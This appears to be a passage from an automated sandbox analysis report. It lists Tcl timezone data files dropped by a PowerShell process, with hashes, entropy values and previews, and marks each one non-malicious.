                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Tucuman) {.. {-9223372036854775808 -15652 0 LMT}.. {-2372096348 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2075
                                                                                                                                                                                                                              Entropy (8bit):3.7445758155279836
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5SHuuSYSaSISBS2ShSmSLVS+E1/SKSZSGRSoSpS7S6S4wRSenSOafwwfFC8OS0jE:YOu3pfe92jCs/VOHv2kdeRtnxafwwfFn
                                                                                                                                                                                                                              MD5:16A89FD2CDEE50E534301A9797311A9D
                                                                                                                                                                                                                              SHA1:4A4EBA1798214C7CF5ACDC0B2EC8B4716CD968CB
                                                                                                                                                                                                                              SHA-256:10B6FF51314D8EE1D010187D8805C4E3D71B778BC6DECB26E66193A5BB3E9EA2
                                                                                                                                                                                                                              SHA-512:DBB0BA3F8AA2B54C86EA8B6530C16DF95AF1331FC5F843B113A204DA20B8EF011FE93C27EB917D01B9040D4914057687B4AACCD292A847559AF69150D1BDC4B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Argentina/Ushuaia) {.. {-9223372036854775808 -16392 0 LMT}.. {-2372095608 -15408 0 CMT}.. {-1567453392 -14400 0 -04}.. {-1233432000 -10800 0 -04}.. {-1222981200 -14400 0 -04}.. {-1205956800 -10800 1 -04}.. {-1194037200 -14400 0 -04}.. {-1172865600 -10800 1 -04}.. {-1162501200 -14400 0 -04}.. {-1141329600 -10800 1 -04}.. {-1130965200 -14400 0 -04}.. {-1109793600 -10800 1 -04}.. {-1099429200 -14400 0 -04}.. {-1078257600 -10800 1 -04}.. {-1067806800 -14400 0 -04}.. {-1046635200 -10800 1 -04}.. {-1036270800 -14400 0 -04}.. {-1015099200 -10800 1 -04}.. {-1004734800 -14400 0 -04}.. {-983563200 -10800 1 -04}.. {-973198800 -14400 0 -04}.. {-952027200 -10800 1 -04}.. {-941576400 -14400 0 -04}.. {-931032000 -10800 1 -04}.. {-900882000 -14400 0 -04}.. {-890337600 -10800 1 -04}.. {-833749200 -14400 0 -04}.. {-827265600 -10800 1 -04}.. {-752274000
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):199
                                                                                                                                                                                                                              Entropy (8bit):4.893042770292303
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290/V90ppv:MByMYbpwt290/V90b
                                                                                                                                                                                                                              MD5:CC015E3E5D3293CAA1348B4E0EE5795C
                                                                                                                                                                                                                              SHA1:75E7EFD905C9001CE9CA5872DA3915A19BCB00E0
                                                                                                                                                                                                                              SHA-256:7490CD66408B8A14C549278FE67DC3338FE9E458F423F01CCBEA00B5E6F6CEF6
                                                                                                                                                                                                                              SHA-512:66523F050E4A42A1C9FC8C02B822CD3864A6E35F6364FB6A675F2A503BD8030FE6E380B252068668A79A6593B5042520EE40700DA033517742B3F0ED33D79DAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Aruba) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7944
                                                                                                                                                                                                                              Entropy (8bit):3.5156463862656775
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:j7RXBXLqbvdvZsV4GGdzVUFg7XaMOhKpJq3o5GMJq90vRFhjGF3RxTBhcXBACBLo:jEJgXh
                                                                                                                                                                                                                              MD5:181203CAD98E94355B9914A205514904
                                                                                                                                                                                                                              SHA1:D361CB53955437270905A9432DE9E7F6C1AE7189
                                                                                                                                                                                                                              SHA-256:EAEFE21276EE60C7F876C1D65039999AC069339DCDB82A23FC9206C274510575
                                                                                                                                                                                                                              SHA-512:AE9262DFC35579AEB610DF8BB5F7FBB49232195F55F78402405017681F72C0D2A09FA9EB605B406065A1F44FE6785AC0163870C921DAFFC4746DA6EDA3081521
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Asuncion) {.. {-9223372036854775808 -13840 0 LMT}.. {-2524507760 -13840 0 AMT}.. {-1206389360 -14400 0 -04}.. {86760000 -10800 0 -03}.. {134017200 -14400 0 -04}.. {162878400 -14400 0 -04}.. {181368000 -10800 1 -04}.. {194497200 -14400 0 -04}.. {212990400 -10800 1 -04}.. {226033200 -14400 0 -04}.. {244526400 -10800 1 -04}.. {257569200 -14400 0 -04}.. {276062400 -10800 1 -04}.. {291783600 -14400 0 -04}.. {307598400 -10800 1 -04}.. {323406000 -14400 0 -04}.. {339220800 -10800 1 -04}.. {354942000 -14400 0 -04}.. {370756800 -10800 1 -04}.. {386478000 -14400 0 -04}.. {402292800 -10800 1 -04}.. {418014000 -14400 0 -04}.. {433828800 -10800 1 -04}.. {449636400 -14400 0 -04}.. {465451200 -10800 1 -04}.. {481172400 -14400 0 -04}.. {496987200 -10800 1 -04}.. {512708400 -14400 0 -04}.. {528523200 -10800 1 -04}.. {544244400 -14400 0 -04}.. {5
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.791603790249234
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE/qlOi+4IAcGEu5B:SlSWB9vsM3y7oDSHAIgpdN/290/qlf+M
                                                                                                                                                                                                                              MD5:5A45B70C79F533548B3DD332F988E15B
                                                                                                                                                                                                                              SHA1:C7485828619A1D4F5CA59D80ABD197100AC58F64
                                                                                                                                                                                                                              SHA-256:518BEB6E54AE811F8C725EA8CC42787D48FC605A3476D6E7A00A1B5733CBD6AC
                                                                                                                                                                                                                              SHA-512:A81C2EBE282E019ED011EADDB8F74C3E6FBE88D87E8D8706B3022CDCC48EF92AD90F9BCF9F25031664BB6EFE069EAFDD23D9B55BF672FC7528A2DD8CB6B986B4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Atikokan) $TZData(:America/Panama)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):177
                                                                                                                                                                                                                              Entropy (8bit):4.812527147763069
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0/yO5WXHAIg20/yOoNvWARL/2IAcGE/ol7x+IAcGs:SlSWB9vsM3y7/yrHAIgp/yH0AN/290/e
                                                                                                                                                                                                                              MD5:13479F64BFBDC7583C637E1562C454B4
                                                                                                                                                                                                                              SHA1:2F59484C779B0D6033FC14E205DA9BCAB7A5FCB1
                                                                                                                                                                                                                              SHA-256:1D6FEE336E71FFFB64874A830C976867C071EBF6B133C296B32F87E3E7D814C9
                                                                                                                                                                                                                              SHA-512:D2C5D35BBBDAB8D58BF6185328124796C06B67ADFB4C1828BA5A9CCA500A01BB8BE69635AE7EEA7FA837A27B20D488A08A29B121DD1617BC373390AD95D67E39
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Adak)]} {.. LoadTimeZoneFile America/Adak..}..set TZData(:America/Atka) $TZData(:America/Adak)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2012
                                                                                                                                                                                                                              Entropy (8bit):3.703391569010329
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5/ChlvEw6kSSx5H4a8tf3fku+da2XUd23t8VZDG8+GyOd:VIlvEwJSSxdF8tfMu+da2kdCt8VZy8+K
                                                                                                                                                                                                                              MD5:69DCC2477D8D81E2F49D295DB6907190
                                                                                                                                                                                                                              SHA1:3C6ED0CEF15D3265C962873480EE1809A4DCACA2
                                                                                                                                                                                                                              SHA-256:64F1EC14F6B43FF10B564F839152E88DF9262F0947D1DB347557FA902F6FD48C
                                                                                                                                                                                                                              SHA-512:71DEA6D47F267AA7326A011872FA74762FA4F8CD57EB149E3B56B3DE9097B0B9258BC4F6C29188B49FC60C1942869B92D9E59FEE6980A5DA5D0029C383D99F39
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bahia) {.. {-9223372036854775808 -9244 0 LMT}.. {-1767216356 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2073
                                                                                                                                                                                                                              Entropy (8bit):4.021485901155292
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:56hey9WUQwuz/V/NF01Y3A6S++S+vS+QQS+1S+9fS+BrS+HoS+8S+/N5S+5zNZf+:5pUIdFS1Y3FUlWQnH7eelN5Lh9LY5Lj
                                                                                                                                                                                                                              MD5:4655AE5AB9C39CA05C1FF36FC366679F
                                                                                                                                                                                                                              SHA1:F3F1D08EC35907A8F45AA2CFD097F6DCCA75C9B8
                                                                                                                                                                                                                              SHA-256:A6233E5BB0D3B30D0E3B94CD797718041AC3C2E75B387D6646A5C0376C5591CD
                                                                                                                                                                                                                              SHA-512:3915B845A312147C5B047096033B3D153E4E83AF4C8E4AAA73C8D12E2A8386CFE8EC4568730F9F28863017A60622DD9CC7D97991C966779B4068BC29F6C6B2B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bahia_Banderas) {.. {-9223372036854775808 -25260 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):648
                                                                                                                                                                                                                              Entropy (8bit):4.251560000277241
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290eWmdH9Colj/uFkv/lC1/uFkOzQs/lps/Ozfah/OzT/lN/uFkX/ll/uFki:5TWeUo5Skv/Y1SkA/g/Bh/m/rSkX/zSt
                                                                                                                                                                                                                              MD5:DC4FA44B2174A4E6F0644FA8EA2E83F9
                                                                                                                                                                                                                              SHA1:C12DF8C862A05D569EAF189272F8BF44303595A1
                                                                                                                                                                                                                              SHA-256:FD5E04136506C6543A9ACDC890A30BCF0D561148E1063EC857E3913DE1EBA404
                                                                                                                                                                                                                              SHA-512:5AC307CD48132B57215CCBAF0BB63F7FA9C5B28DC9F6217C905885D75B0DF131238D4DB2AE707C3DDEE2EDE6C0914644B435FB1CDD9913600D8B69AE95578B0F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Barbados) {.. {-9223372036854775808 -14309 0 LMT}.. {-1841256091 -14400 0 AST}.. {-874263600 -10800 1 ADT}.. {-862682400 -14400 0 AST}.. {-841604400 -10800 1 ADT}.. {-830714400 -14400 0 AST}.. {-820526400 -14400 0 -0330}.. {-811882800 -12600 1 AST}.. {-798660000 -14400 0 -0330}.. {-788904000 -14400 0 AST}.. {234943200 -10800 1 ADT}.. {244616400 -14400 0 AST}.. {261554400 -10800 1 ADT}.. {276066000 -14400 0 AST}.. {293004000 -10800 1 ADT}.. {307515600 -14400 0 AST}.. {325058400 -10800 1 ADT}.. {338706000 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1031
                                                                                                                                                                                                                              Entropy (8bit):3.8842563546204225
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5fe300cChlrLPsw6kSS3h5R14eH8tf3xd:5+CChlvEw6kSSx5H4a8tf3xd
                                                                                                                                                                                                                              MD5:DFA5E50F6AEF1311A4CF74970477E390
                                                                                                                                                                                                                              SHA1:5B63676EB8039B2BE767BAA44820F2DAE5B62876
                                                                                                                                                                                                                              SHA-256:549625CCB30BD0E025BAC47668BA3AA0CDD8569E5887E483C8D62B5B7302FA50
                                                                                                                                                                                                                              SHA-512:4BBB43694E3B54339C549AC3A5488B77366DB1189D8D1834DCF618D9448084A950B575E207064521B1CDFD2E41F7D1D8C5CD9CEB4668D4459585649556136EB0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Belem) {.. {-9223372036854775808 -11636 0 LMT}.. {-1767213964 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3284
                                                                                                                                                                                                                              Entropy (8bit):3.8546064195941097
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5pKSxZwR9IVQU55DG5krgGN8wW+YeD1yyfCwoc:HKSjgIVzrG5krRN8wWheD1yu
                                                                                                                                                                                                                              MD5:4DA622B685B3B075CC94FC4E23322547
                                                                                                                                                                                                                              SHA1:DEB23F0A434549DAE1BE60ACF757BB212C907B92
                                                                                                                                                                                                                              SHA-256:E07F45264E28FD5AA54BD48CB701658509829CF989EC9BD79498D070A1BA270F
                                                                                                                                                                                                                              SHA-512:9B00BF8870BC4AAEF7F06FCDFEEEF54686A2CC890103696631EB4DEF5AEEAD051EC9069D70A2B22397F18C0067E03A54E75DA18474D6B1BD3BDA2D5313E0AD16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Belize) {.. {-9223372036854775808 -21168 0 LMT}.. {-1822500432 -21600 0 CST}.. {-1616954400 -19800 1 -0530}.. {-1606069800 -21600 0 CST}.. {-1585504800 -19800 1 -0530}.. {-1574015400 -21600 0 CST}.. {-1554055200 -19800 1 -0530}.. {-1542565800 -21600 0 CST}.. {-1522605600 -19800 1 -0530}.. {-1511116200 -21600 0 CST}.. {-1490551200 -19800 1 -0530}.. {-1479666600 -21600 0 CST}.. {-1459101600 -19800 1 -0530}.. {-1448217000 -21600 0 CST}.. {-1427652000 -19800 1 -0530}.. {-1416162600 -21600 0 CST}.. {-1396202400 -19800 1 -0530}.. {-1384713000 -21600 0 CST}.. {-1364752800 -19800 1 -0530}.. {-1353263400 -21600 0 CST}.. {-1333303200 -19800 1 -0530}.. {-1321813800 -21600 0 CST}.. {-1301248800 -19800 1 -0530}.. {-1290364200 -21600 0 CST}.. {-1269799200 -19800 1 -0530}.. {-1258914600 -21600 0 CST}.. {-1238349600 -19800 1 -0530}.. {-1226860200 -21600
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):206
                                                                                                                                                                                                                              Entropy (8bit):4.938043196147077
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290F490ppv:MByMYbpwt290S90b
                                                                                                                                                                                                                              MD5:09FD8280CC890F238126F9641DB7C90E
                                                                                                                                                                                                                              SHA1:98AB4E0DE8173C2BB2532B07FAE2E71F588AB26F
                                                                                                                                                                                                                              SHA-256:FACD0A835D1F425CD323EE453ADE231810B2D1CF6EBA227BA1B50522AE3879F7
                                                                                                                                                                                                                              SHA-512:117C24389B7BFB079F4409B1FA6AA547654D7C69A6CBB19218BF2B96F6CFE3CBAAD400D4C2EFE8A9BFE25F44402057427FC8A62DC20A98018D23A7CF9B87401F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Blanc-Sablon) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1199
                                                                                                                                                                                                                              Entropy (8bit):3.7988385604912893
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5EThevwnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQZ:5EHSeSFESoSQSrSsCSeSPS1cSQSQlSsp
                                                                                                                                                                                                                              MD5:9529221F9B4E104CC598491703B10E6C
                                                                                                                                                                                                                              SHA1:5ACD61B525A18DE1919A7484C92EC5D787DF2F25
                                                                                                                                                                                                                              SHA-256:10592EA1CB0D02C06A61059EC601F70A706A5053AC923B9EED29388D5E71EF3A
                                                                                                                                                                                                                              SHA-512:66BEDB631469651A5E426155428764E3C1C14483E6FEE1505812E8676EB6E82CF0A88F6CC697F03FDA0AF906D91C7DE6E940DF3D33DD247BEF51DBD9A13DEE16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Boa_Vista) {.. {-9223372036854775808 -14560 0 LMT}.. {-1767211040 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):246
                                                                                                                                                                                                                              Entropy (8bit):4.705337479465446
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290bJhDm2OHDgoHvcuknov/zEXPKV2kR/uFVEV/KVg:MB86290bLmdHDgCvcukCz8O2Y/uF2/Og
                                                                                                                                                                                                                              MD5:DB019451A7D678C3E7AEE706283861F6
                                                                                                                                                                                                                              SHA1:57E63C5372F50CBD1A7FA32688C1B77ADDCC06EB
                                                                                                                                                                                                                              SHA-256:B6ADC16815DC95E537548CA3572D7F93626A6D1DC390DD4CBABAB5AB855BBA30
                                                                                                                                                                                                                              SHA-512:6C94B2D7EFA856E6BD41FC45B0E8D16A40E61D8B895397CD71230047FAD4793DDB9ABAAC57D2841549F161C9389D7E61D54D38F1BAC6F13ED3DD4C68CDD3272C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Bogota) {.. {-9223372036854775808 -17776 0 LMT}.. {-2707671824 -17776 0 BMT}.. {-1739041424 -18000 0 -05}.. {704869200 -14400 1 -05}.. {733896000 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8605
                                                                                                                                                                                                                              Entropy (8bit):3.8563913604109064
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:eSwtktXNmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:/jXNDPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:005D0BF1320030A7E9CDC97D0C8BB44B
                                                                                                                                                                                                                              SHA1:CB236DA840A49B4BCD261114DCA38DADA567B091
                                                                                                                                                                                                                              SHA-256:93AF910CB2AD2203B71C1AD49D56DF4A4A14D07F885AFD4E755271F1372A517C
                                                                                                                                                                                                                              SHA-512:16A5483392741673BEC020EF6EBE963AB0FB12629D662C586C27A1E9A1BE3FEA8DC3D05A0E84917B8166E48CADA45C74DFABFDC897A6BC94D3C5058D31AD5126
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Boise) {.. {-9223372036854775808 -27889 0 LMT}.. {-2717640000 -28800 0 PST}.. {-1633269600 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-1601820000 -25200 1 PDT}.. {-1583679600 -28800 0 PST}.. {-1471788000 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126255600 -25200 0 MST}.. {129114000 -21600 0 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):239
                                                                                                                                                                                                                              Entropy (8bit):4.821972751564724
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MQA+zAHAIgp/MQA+zE5N/290BFzk5h490/MQA+zd:MByMY/MV+zhp/MV+zE5t290rzy490/MW
                                                                                                                                                                                                                              MD5:6700956D5FE96CEC8D34EB49FF805374
                                                                                                                                                                                                                              SHA1:69B9973EF31AE204EFED7485E59CEA99E00815C8
                                                                                                                                                                                                                              SHA-256:DEFC5C9DA2D4D4146145A50D692A6BFF698C3B0A1F19EFD82AD0EE7678F39FCF
                                                                                                                                                                                                                              SHA-512:A80C03A519F00A4270248E885463090A34B3992B3DEBA94DD6AEBCC50736541655461E4AA10856125B8EF9B92CEB697429EE7088DBC6AB4FAE383FDF11521B7A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Buenos_Aires)]} {.. LoadTimeZoneFile America/Argentina/Buenos_Aires..}..set TZData(:America/Buenos_Aires) $TZData(:America/Argentina/Buenos_Aires)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7739
                                                                                                                                                                                                                              Entropy (8bit):3.8713679494465016
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:zsGaLV9T1sF7Lv/PCewtA8CzSPyDLbrcUia:h5lLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:E6AE12CDB55FED492C253E46E2690FE0
                                                                                                                                                                                                                              SHA1:CD3699E50BC1694827E51E4101C713E52FA646C8
